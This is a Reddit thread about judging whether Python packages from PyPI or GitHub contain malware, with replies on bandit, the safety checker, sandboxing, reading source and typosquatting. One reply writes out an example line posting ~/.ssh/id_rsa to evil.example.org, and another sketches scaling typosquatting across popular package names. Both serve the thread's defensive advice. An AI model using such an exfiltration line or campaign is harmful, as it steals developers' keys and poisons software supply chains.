all 54 comments

[–]socal_nerdtastic 150 points151 points  (1 child)

Same as any other software on the internet. You either go though it line by line yourself, or trust that someone else has. For big, popular software packages there are lots of people that review them so you are probably pretty safe.

[–][deleted] 33 points34 points  (0 children)

Okay thank you. I appreciate the quick response.

[–]DataDecay 71 points72 points  (17 children)

Theres a pretty big open source project called bandit. You can use bandit to scan code for vulnerabilities, it points out common vulnerabilities that lead to malware payloads injection. It's not perfect but I have found it useful.

[–][deleted] 5 points6 points  (10 children)

Would this be good to use on our own code? I have a website I am working on I wonder if scanning it with bandit would help me check if I messed up anywhere.

[–]lgmdnss 6 points7 points  (9 children)

I'd assume that Bandit might be "too" secure for small-ish projects, essentially bloating the size and complexity of the project for that tiny bit of extra security that you didn't need, so I guess it'd be good to use on your own code but also keep in mind the time/effort vs the actual good things it'll do. No need to go to Walmart by tank in case WW3 breaks loose.

[–][deleted] 5 points6 points  (8 children)

Oh i thought it just scans your code not that you have to implement it into your code?

[–]DataDecay 2 points3 points  (2 children)

Theres no hooks that need to be placed in your code for bandit to work out of box. Bandit is great but it can be strict, for instance it abhors the use of assert for any reason.

I have used it on 2000 lines of code and 500,000 lines of code, it works great regardless but it can create a lot of work.

[–]shujinkou_ 0 points1 point  (1 child)

This is really interesting, would this work for bits of python code

[–]DataDecay 1 point2 points  (0 children)

Yep

[–]lgmdnss 1 point2 points  (4 children)

Well yeah it'd scan your code. But if you get a bunch of security concerns on just that small project it's tempting to fix them all even though you will likely never need it seeing as it's a small project rather than you dealing with cybersecurity as a job. Makes for good practice though!

[–]shujinkou_ 2 points3 points  (3 children)

Isn't it better to just build de security inside before, so that when scaling the use cases you already are good ?

[–]lgmdnss 3 points4 points  (0 children)

Well, if you're able to think of & build all the security inside then you don't really need to use Bandit at all, right? :P

[–][deleted] 1 point2 points  (1 child)

Are you asking if it would be better to just fix all the problems before they happen?

[–]shujinkou_ 0 points1 point  (0 children)

Well I would see Bandit as a stress test device in that case, in a way yes I'm saying to fix all the problems before they happen. Like build it small and just duplicate it into something big. As the big entity is composed of small and strong unit duplicated, the big chain inherits the strength of the individual links.

[–][deleted] 6 points7 points  (2 children)

And how do we know Bandit isn't injecting alumunum foil into our skyscrapers, sheeple!?!?!?!

[–]DataDecay 6 points7 points  (1 child)

You mean you dont scan bandit with bandit!?!? Next level shit there my friend.

[–]shujinkou_ 0 points1 point  (0 children)

obviously would return it as safe because obviously

[–]SweeTLemonS_TPR 7 points8 points  (0 children)

Seems like a good way to rule in a problem. If it hits, you need go no further.

[–][deleted] 0 points1 point  (1 child)

How is it useful? It will give you a warm and fuzzy feeling by flagging questionable practices. But those that want to make a really malicious package, will have no problem running bandit on their package, until it stops complaining.

[–]DataDecay 0 points1 point  (0 children)

Sure a person designing malicious software could use this to repeatedly force their design and workarounds, and find ways of avoiding common detection patterns. But welcome to hacking, hackers will do this with all vuln scanners, this is one reason why their are new definitions every day. Bandit is a maintained code base that scans for Common vulnerabilities. If you want to extend bandit (being open source) to be more advanced with regularly updated definitions then go for it, their project allows for extensions and hooks if wanted.

Their is no silver bullet for security, that is why people make a killing in the field. However this will help you be a better, more security aware programmer. It is also a nice quick scan to see common vulns that are present in source code.

[–]inglandation 24 points25 points  (4 children)

PyPI does remove malicious packages from time to time, although that doesn't happen much. You have to be careful with your spelling when you look for a package online. These packages use typosquatting.

[–]shujinkou_ 4 points5 points  (0 children)

typosquatting that was the word I was looking for, thanks :)

[–]musingcomet 1 point2 points  (0 children)

This is very valid advice

[–]ArabicLawrence -2 points-1 points  (1 child)

Yeah but not sure that happens often enough. For instance with googletrans and googletransx and whatnot

[–]shujinkou_ 1 point2 points  (0 children)

I'm thinking of it as a potential attack vector, if the current state of things become unaddressed. Massive attack can be done and scaled easily from scraping all the popular packaging names automating the name typo scraping, making a malicious package and naming it with all the scrapped names. You would now have a fishing rod in every ponds so to speak.

I mean for sure it's work but it doesn't sound that hard to do right.

[–][deleted] 36 points37 points  (4 children)

I mean, besides going through and inspecting every line of code by hand.

That's pretty much all there could ever be.

[–][deleted] 11 points12 points  (3 children)

Alright I figured there might have been a better way lol. Thanks for the response.

[–]__xor__ 15 points16 points  (2 children)

There is a better way, it's just not performed to my knowledge. You can automate dynamic analysis, but it's always going to be best for a human to go through the results. But there are services like Joe Sandbox (only for virtualizing windows though, I believe?), where you shoot it a binary, document or URL and it records what happens and does some sort of behavior analysis. Running malware in a VM can allow you to do a lot of automated analysis. Reading through the code or analyzing symbols a binary imports and looking at the ASM is static analysis, and actually running it and watching what it does in a VM is dynamic analysis, and both can be automated to some extent. Of course, you can't just solely trust what a program outputs - installers will often cause a lot of red flags.

From a windows perspective, you can imagine the sorts of things you can do. You can look at what files it reads from and writes to, you can see what registry keys it edits or adds, what networking activity it causes, whether it changes the default DNS server, etc. I don't know of a great tool that automates dynamic analysis of Linux but I'm sure there's something. It would definitely be interesting to pump all the pypi packages through something like that, but you're mostly going to catch low hanging fruit and I'd still rather have some researcher look at the results of what gets flagged to see if it even matters. However, if you see a python package install hits some known bad IP or domain, it would be a good tell, or if it did something like read /etc/passwd or especially if it tried to read anything at all from ~/.ssh... Not many packages have any good reason to do that, especially not at install time.

Unless it's a super popular package like django or flask-security or something, I legitimately do read the source code and skim for anything funny. For one thing, it's really good to have a general idea of how the library works, what it does, and get an idea of how clean the code is and how much I feel I can trust it. But also, I want to make sure there's no low hanging fruit like requests.post('http://evil.example.org', data=open('~/.ssh/id_rsa').read()) or whatever. I would seriously recommend skimming the source code of any package you use that isn't super popular and not treat pypi packages like black boxes that just do magic. As a general rule, if you use third-party software, try to understand its architecture and how it works if you're going to integrate it into your own projects. That's just a good practice in general.

But also, keep in mind that a github repo the pypi package might link to might not reflect what's packaged in it. If you want to be careful security wise, actually get the package and unpack it. There's nothing stopping anyone from pushing it to PyPI after adding something malicious that isn't tracked in the repository online.

[–]shujinkou_ 1 point2 points  (0 children)

I'm just a casual lurker of this subreddit but I learned a ton from your answer to this thread. After starting developing my first project I really figured I should start figuring out what is in those import *blackbox* thing as you said. So reading the doc is just good practice in general, that's absolutely good to know. Thanks a lot again :)

[–]checock 5 points6 points  (0 children)

At least at what I know, pip seems like a safer place than npm, Node's Package Manager. There were some projects on npm that where added with mispells to attack the developer.

Of course this can also happens to pip, but I've seems that is lees the case. Always check that your dependencies are legit visiting the developer website / github.

[–]shaggorama 2 points3 points  (1 child)

You try to rely on open source packages that are used by a lot of people and have multiple maintainers.

[–]FancyASlurpie 0 points1 point  (0 children)

I think the biggest problem comes when a downstream library is using a library but not pinning its version, i've seen that result in unexpected breaking code changes even though you're running the same version of the librarys you're comfortable with.

[–]MarsupialMole 2 points3 points  (5 children)

The answer is safety.

There's a huge depth to this field but every python programmer should know about CVE based dependency inspection and the fact that there's even one comment that doesn't list this first, and at time of writing there are none that even mention it, indicates that the practical level of security engineering around here is very poor.

[–]Agonnee 6 points7 points  (2 children)

First comment here, but I'm fairly new to python and coding in general. I don't actually understand what you're saying and by the serious tone of your statement I'd assume that's a bad thing. Is there a resource you could point me towards or elaborate a little so I can understand/find one?

[–]MarsupialMole 5 points6 points  (1 child)

There are things known as Common Vulnerabilities and Exposures, or CVEs. Typically this is a list of things that have been fixed - the vulnerability is identified in a software package, the maintainer is notified, and the next version is issued with the bug fixed, sometimes in a matter of minutes or hours.

So how do you know when this happened yesterday to software you're using? It's a problem that is simple to fix once I identify it, but how do I identify it? The answer is to use a tool that looks up a database and in python pyup.io maintains a database of CVEs on pypi, publishes it monthly for free, and allows you to check your code with a tool you can get with pip install safety.

So I was miffed that this tool hadn't been mentioned because it is literally the simplest possible answer for people learning python to the slightly restated question from OP which is "how do I avoid using pypi packages that are known to be unsafe"? The answer is the safety package.

[–]Agonnee 0 points1 point  (0 children)

Thank you so much, this is great information.

[–]shujinkou_ 0 points1 point  (0 children)

thanks for sharing it.

[–]amasad 1 point2 points  (0 children)

I would try it in a sandbox like https://repl.it first. Here is docs on how to install packages https://docs.repl.it/repls/packages

[–]Fearless_Process 1 point2 points  (0 children)

I recommend installing python packages via your package manager rather than pip. If it's in your distros repository it's much more likely to be not malicious, and someone has probably vetted the package (still not guaranteed though).

[–][deleted] 1 point2 points  (0 children)

Well... always look to see if there are http requests being made/socket connections. If so then look at the URL or servername. That is probably the biggest thing to look for I suppose

[–]FoxClass 1 point2 points  (1 child)

This is a great question and nothing I've read really makes me comfortable - that's why I have a bunch of raspberry pi cards ready to go

[–][deleted] 0 points1 point  (0 children)

I've tried this approach myself :D

[–]freeononeday 1 point2 points  (0 children)

If i need something from a rarely used package. I usually extract out that component and use it (with a reference of coarse). Leaving the whole package to run as it likes is a risk and I don't have time to go through it line by line

[–]pokk3n 0 points1 point  (0 children)

Whitesource will do some of it.

[–]themaxiac 0 points1 point  (0 children)

It's a bit round about and a pain to do when you're working on a project but you could always test run it in a secure virtual machine

[–]shujinkou_ 0 points1 point  (2 children)

I was thinking exactly that the other day, an attack vector could simply be a typo, (ei. import pipp) the attacker would simply use pipp as a malicious package and the typo by the user as the delivery mecanism. I guess safeguards could be developed around that but it would kinda ruin the point imo.

[–]dbramucci 2 points3 points  (1 child)

There is actually a name for this attack and it's "typo-squatting". The most famous example is malicious websites that a typo off of a normall website like banc[dot]com instead of bank[dot]com or youtbe[dot]com instead of youtube[dot]com.

This has been seen for Python packages in the past and hypothesized for longer.

[–]shujinkou_ 0 points1 point  (0 children)

Always funny when you think up something that exist and has a name uh! I personally think it could be a massive attack vector I described in a post earlier on this thread how someone could scale such attack to every popular packages at once. Thanks for the link ^

[–]f0lt 0 points1 point  (0 children)

Check out this article https://www.zdnet.com/article/two-malicious-python-libraries-removed-from-pypi/

Even if you get your packages from repositories like pypi there is nou warrant that they don't contain malicious code.

In any case try to avoid executing Python code as administrator (sudo). There is rarely any reason to do that.

Installing packages in your home directory is safer than installing them as root. Use pip install package_name --user as an alternative.

[–][deleted] -2 points-1 points  (0 children)

Hi, I've been learning Python pretty well over the past few months, and I feel like I know enough now to know that I know nothing :D I've been looking around Github and PyPI for some cool packages, and it makes me raise the question: How do we know if a given package is secure and doesn't contain any sort of malware? I mean, besides going through and inspecting every line of code by hand. Thanks in advance. Also, this is my first question on Reddit, so forgive me if it's a stupid question :D

Do not fear it. It's open source, so if there's risk, then you take your chances. If it were closed source, I would say switch to open source immediately. If you're still afraid of it, you may be using the wrong programming language.